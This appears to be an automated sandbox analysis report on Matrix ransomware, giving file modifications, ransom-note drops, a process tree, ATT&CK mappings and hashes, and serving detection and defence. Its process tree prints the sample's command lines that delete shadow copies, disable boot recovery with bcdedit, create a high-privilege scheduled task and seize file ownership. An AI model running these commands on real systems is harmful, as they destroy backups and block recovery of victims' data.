File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\LimitEdit.wpl	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\sysinfo.bat	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libjpeg_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\rt.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\pack200.exe	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_rtp_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ja_JP.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterBold.ttf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_output\libglwin32_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\MoveStep.zip	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_ja.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\prism_sw.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5020 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4416 vssadmin.exe

pid	process
5020	schtasks.exe

pid	process
4416	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exeQhbGVYKB64.exe

pid	process
4392	powershell.exe
4392	powershell.exe
4392	powershell.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe
2808	QhbGVYKB64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

QhbGVYKB64.exe

pid process

2808 QhbGVYKB64.exe

pid	process
2808	QhbGVYKB64.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exetakeown.exeQhbGVYKB64.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeTakeOwnershipPrivilege	4148	takeown.exe
Token: SeDebugPrivilege	2808	QhbGVYKB64.exe
Token: SeLoadDriverPrivilege	2808	QhbGVYKB64.exe
Token: SeBackupPrivilege	4504	vssvc.exe
Token: SeRestorePrivilege	4504	vssvc.exe
Token: SeAuditPrivilege	4504	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4592	WMIC.exe
Token: SeSecurityPrivilege	4592	WMIC.exe
Token: SeTakeOwnershipPrivilege	4592	WMIC.exe
Token: SeLoadDriverPrivilege	4592	WMIC.exe
Token: SeSystemProfilePrivilege	4592	WMIC.exe
Token: SeSystemtimePrivilege	4592	WMIC.exe
Token: SeProfSingleProcessPrivilege	4592	WMIC.exe
Token: SeIncBasePriorityPrivilege	4592	WMIC.exe
Token: SeCreatePagefilePrivilege	4592	WMIC.exe
Token: SeBackupPrivilege	4592	WMIC.exe
Token: SeRestorePrivilege	4592	WMIC.exe
Token: SeShutdownPrivilege	4592	WMIC.exe
Token: SeDebugPrivilege	4592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4592	WMIC.exe
Token: SeRemoteShutdownPrivilege	4592	WMIC.exe
Token: SeUndockPrivilege	4592	WMIC.exe
Token: SeManageVolumePrivilege	4592	WMIC.exe
Token: 33	4592	WMIC.exe
Token: 34	4592	WMIC.exe
Token: 35	4592	WMIC.exe
Token: 36	4592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4592	WMIC.exe
Token: SeSecurityPrivilege	4592	WMIC.exe
Token: SeTakeOwnershipPrivilege	4592	WMIC.exe
Token: SeLoadDriverPrivilege	4592	WMIC.exe
Token: SeSystemProfilePrivilege	4592	WMIC.exe
Token: SeSystemtimePrivilege	4592	WMIC.exe
Token: SeProfSingleProcessPrivilege	4592	WMIC.exe
Token: SeIncBasePriorityPrivilege	4592	WMIC.exe
Token: SeCreatePagefilePrivilege	4592	WMIC.exe
Token: SeBackupPrivilege	4592	WMIC.exe
Token: SeRestorePrivilege	4592	WMIC.exe
Token: SeShutdownPrivilege	4592	WMIC.exe
Token: SeDebugPrivilege	4592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4592	WMIC.exe
Token: SeRemoteShutdownPrivilege	4592	WMIC.exe
Token: SeUndockPrivilege	4592	WMIC.exe
Token: SeManageVolumePrivilege	4592	WMIC.exe
Token: 33	4592	WMIC.exe
Token: 34	4592	WMIC.exe
Token: 35	4592	WMIC.exe
Token: 36	4592	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.execmd.exeQhbGVYKB.execmd.exe

description	pid	process	target process
PID 2112 wrote to memory of 1848	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 1848	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 1848	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 2448	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	NWNCehUW.exe
PID 2112 wrote to memory of 2448	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	NWNCehUW.exe
PID 2112 wrote to memory of 2448	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	NWNCehUW.exe
PID 2112 wrote to memory of 4348	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4348	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4348	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 4348 wrote to memory of 4392	4348	cmd.exe	powershell.exe
PID 4348 wrote to memory of 4392	4348	cmd.exe	powershell.exe
PID 4348 wrote to memory of 4392	4348	cmd.exe	powershell.exe
PID 2112 wrote to memory of 4584	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4584	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4584	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4596	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4596	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4596	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 4584 wrote to memory of 4684	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4684	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4684	4584	cmd.exe	reg.exe
PID 4596 wrote to memory of 4704	4596	cmd.exe	wscript.exe
PID 4596 wrote to memory of 4704	4596	cmd.exe	wscript.exe
PID 4596 wrote to memory of 4704	4596	cmd.exe	wscript.exe
PID 4584 wrote to memory of 4760	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4760	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4760	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4812	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4812	4584	cmd.exe	reg.exe
PID 4584 wrote to memory of 4812	4584	cmd.exe	reg.exe
PID 2112 wrote to memory of 4868	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4868	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 2112 wrote to memory of 4868	2112	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe	cmd.exe
PID 4704 wrote to memory of 4948	4704	wscript.exe	cmd.exe
PID 4704 wrote to memory of 4948	4704	wscript.exe	cmd.exe
PID 4704 wrote to memory of 4948	4704	wscript.exe	cmd.exe
PID 4868 wrote to memory of 5012	4868	cmd.exe	attrib.exe
PID 4868 wrote to memory of 5012	4868	cmd.exe	attrib.exe
PID 4868 wrote to memory of 5012	4868	cmd.exe	attrib.exe
PID 4948 wrote to memory of 5020	4948	cmd.exe	schtasks.exe
PID 4948 wrote to memory of 5020	4948	cmd.exe	schtasks.exe
PID 4948 wrote to memory of 5020	4948	cmd.exe	schtasks.exe
PID 4868 wrote to memory of 5060	4868	cmd.exe	cacls.exe
PID 4868 wrote to memory of 5060	4868	cmd.exe	cacls.exe
PID 4868 wrote to memory of 5060	4868	cmd.exe	cacls.exe
PID 4704 wrote to memory of 5084	4704	wscript.exe	cmd.exe
PID 4704 wrote to memory of 5084	4704	wscript.exe	cmd.exe
PID 4704 wrote to memory of 5084	4704	wscript.exe	cmd.exe
PID 5084 wrote to memory of 2056	5084	cmd.exe	schtasks.exe
PID 5084 wrote to memory of 2056	5084	cmd.exe	schtasks.exe
PID 5084 wrote to memory of 2056	5084	cmd.exe	schtasks.exe
PID 4868 wrote to memory of 4148	4868	cmd.exe	takeown.exe
PID 4868 wrote to memory of 4148	4868	cmd.exe	takeown.exe
PID 4868 wrote to memory of 4148	4868	cmd.exe	takeown.exe
PID 4868 wrote to memory of 4356	4868	cmd.exe	cmd.exe
PID 4868 wrote to memory of 4356	4868	cmd.exe	cmd.exe
PID 4868 wrote to memory of 4356	4868	cmd.exe	cmd.exe
PID 4356 wrote to memory of 4424	4356	cmd.exe	QhbGVYKB.exe
PID 4356 wrote to memory of 4424	4356	cmd.exe	QhbGVYKB.exe
PID 4356 wrote to memory of 4424	4356	cmd.exe	QhbGVYKB.exe
PID 4424 wrote to memory of 2808	4424	QhbGVYKB.exe	QhbGVYKB64.exe
PID 4424 wrote to memory of 2808	4424	QhbGVYKB.exe	QhbGVYKB64.exe
PID 4216 wrote to memory of 4416	4216	cmd.exe	vssadmin.exe
PID 4216 wrote to memory of 4416	4216	cmd.exe	vssadmin.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

5012 attrib.exe

pid	process
5012	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
"C:\Users\Admin\AppData\Local\Temp\e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe" "C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe"
  2⤵
  PID:1848
- C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe
  "C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\o9QjbXvE.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\o2R6BrBF.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\o2R6BrBF.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4684
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Matrix Ransomware
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\lUcGld9y.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\lUcGld9y.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DeYAqowH.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4948
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DeYAqowH.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5020
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5084
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZJXYQLRa.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Views/modifies file attributes
    PID:5012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c QhbGVYKB.exe -accepteula "SmsInterceptStore.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe
      QhbGVYKB.exe -accepteula "SmsInterceptStore.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4424
    - - C:\Users\Admin\AppData\Local\Temp\QhbGVYKB64.exe
        
        QhbGVYKB.exe -accepteula "SmsInterceptStore.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\DeYAqowH.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4216
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4416
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4592
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4828
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4588
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4616

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
42f915c1da6fdcb693f0e9d1257a5213

SHA1
e163d54f3af1352e8f9d6fa8a680b653d51f7413

SHA256
8c3e13364e29f3ae1e1a496c13e5ef73049573d8ac0cffcaf06506b98ef38243

SHA512
62dea5e0e07a0fb1e505418cc688e24da7fb8d76f1faf5a21aefc0576e8e387595acb84ef2c19c292dae79c4f6e1743c634d2f6e3046db82260004d86461650d

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe

MD5
739562b08a6131cce604c0e7ffa1a07d

SHA1
eabe2b22d6af539871b81625c0c3a3efb58afd90

SHA256
e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569

SHA512
457dd85e77bf9bd32275230185b7c350245729afeb7c0eaa50a52bbdc109ed41a0d9a4ecf16a186c3bf163f31e86d91060dcb7f7d64494bcb5f6ee21d8f32c9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe

MD5
739562b08a6131cce604c0e7ffa1a07d

SHA1
eabe2b22d6af539871b81625c0c3a3efb58afd90

SHA256
e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569

SHA512
457dd85e77bf9bd32275230185b7c350245729afeb7c0eaa50a52bbdc109ed41a0d9a4ecf16a186c3bf163f31e86d91060dcb7f7d64494bcb5f6ee21d8f32c9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\QhbGVYKB64.exe

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\QhbGVYKB64.exe

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZJXYQLRa.bat

MD5
91ed286f4d056237538808101c791754

SHA1
0b9e6909a60cc8d0130c93eb4f47d86554ecd636

SHA256
86168ac47d57624bf4a690f988ebc7eb3efbd92f7af00eb2ba25b9b23bd2235d

SHA512
9de1d2275c2d452d3f29fd384fd46ebd2b935e37443a7485b7363d527b6594f0863da1d7d5148d485f33aff7c2599d7041abcb212c62656c94ee42a8d2415238

Download Submit
C:\Users\Admin\AppData\Local\Temp\o9QjbXvE.txt

MD5
75564e2df4b8c8d33695e8e5e58cb03c

SHA1
64a796a9f01a1f12bcbe641ecc92541a41ece9b5

SHA256
bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965

SHA512
c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af

Download Submit
C:\Users\Admin\AppData\Roaming\DeYAqowH.bat

MD5
333472c0ef584b6d6593d3aea09c4900

SHA1
116a83c732b9814f91a72c041ef510697fe5bb3a

SHA256
fd59539a17f3467364429c634f7e2b48f19b8633484ea0ace4a4be01b9c95cbb

SHA512
3e6007775b97dcbcdbcfc07e265fa5bfd5dc53f01faf10be68d19152fd17425261be02c763c8d3705c10ede06448c70f4c30d00910f03e3c36906bf1d7505a13

Download Submit
C:\Users\Admin\AppData\Roaming\lUcGld9y.vbs

MD5
4c2bf9c3f1ac964c399edfa48f23da62

SHA1
d2a6f14e46cec004b810f8e071e82fc5730c0563

SHA256
5c97af3f32e6a6ac69d5bf8d406a49ff1949f05d2e4bcf623708176178028717

SHA512
45de4b1629e0536dc5eaf75f0ed219f319de8129fb4fbc3dce33d06978c2c04f4e78ddd40e52495b9184fba57d5161844c7fd84f0304d3db382538676444bd0f

Download Submit
memory/1848-114-0x0000000000000000-mapping.dmp

Download
memory/2056-157-0x0000000000000000-mapping.dmp

Download
memory/2448-115-0x0000000000000000-mapping.dmp

Download
memory/2808-163-0x0000000000000000-mapping.dmp

Download
memory/4148-158-0x0000000000000000-mapping.dmp

Download
memory/4348-118-0x0000000000000000-mapping.dmp

Download
memory/4356-159-0x0000000000000000-mapping.dmp

Download
